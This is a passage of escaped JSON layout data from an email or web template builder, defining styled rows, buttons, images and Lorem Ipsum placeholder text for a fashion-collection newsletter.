ideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"q53kjy0Fbp\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kXlgdO_sPN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z5SNU6N6JW\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_21\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\">WHERE DOES IT COME FROM?<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ypX1LDDnWm\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ecf0f1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_26\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Lorem Ipsum is simply dummy text of the printing and typesetting industry.<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.&nbsp;<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"SQpFTgzFHB\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"20px 30px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">MORE SPECIAL OFFERS<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":210,\\\"calculatedHeight\\\":56}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#ef0d33\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"R_AV9AZjR_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"LO80TmK1uI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"plSJG4Z-kl\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_19\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"asWld2pGJl\\\",\\\"cells\\\":[49.83,50.17],\\\"columns\\\":[{\\\"id\\\":\\\"e-sogD6YwY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UH__OC3KxN\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>AUTMN COLLECTION<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"y9l55XPumV\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\"><strong>CASUAL STYLE<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"6CEH_UVsP-\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#0e0f13\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_22\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. here are many variations of passages.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uPKyGk_-mK\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 14px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_9\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">READ MORE<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":119,\\\"calculatedHeight\\\":36}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"fsD97o3vAj\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Xq0WFxLUHL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603387726674-18031\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_11\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"i1aayj1OCs\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"1swPbJHMCz\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AVkIerpg3f\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_22\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_16\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"j9TnibP9Xl\\\",\\\"cells\\\":[48.17,51.83],\\\"columns\\\":[{\\\"id\\\":\\\"taZ8dzbo1M\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VivHHBb3e6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603388139490-863543\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_20\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"9dOES5WBCA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qX8h97rG_z\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_27\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>AUTMN COLLECTION<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"HjSkOv8qX8\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_28\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\"><strong>COMBINING STYLES<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"eYdD2v3nEX\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#0e0f13\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_29\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. here are many variations of passages.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LuRH-I-q_Y\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_7\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">READ MORE<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":119,\\\"calculatedHeight\\\":36}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_21\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_15\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"fyEFs2OfCp\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D0IQ6ZM4sR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"pRF-ulYOnC\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#db1908\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"20px 40px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_10\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">SHOW MORE POST<\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":204,\\\"calculatedHeight\\\":56}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"fkik_g4BzN\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2LQ7U_SkJw\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Y4L0bNJWI7\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_30\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 28px; font-size: 20px;\\\\\\\">1914 TRANSLATION BY H. RACKHAM&nbsp;<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rKNPh49QYC\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 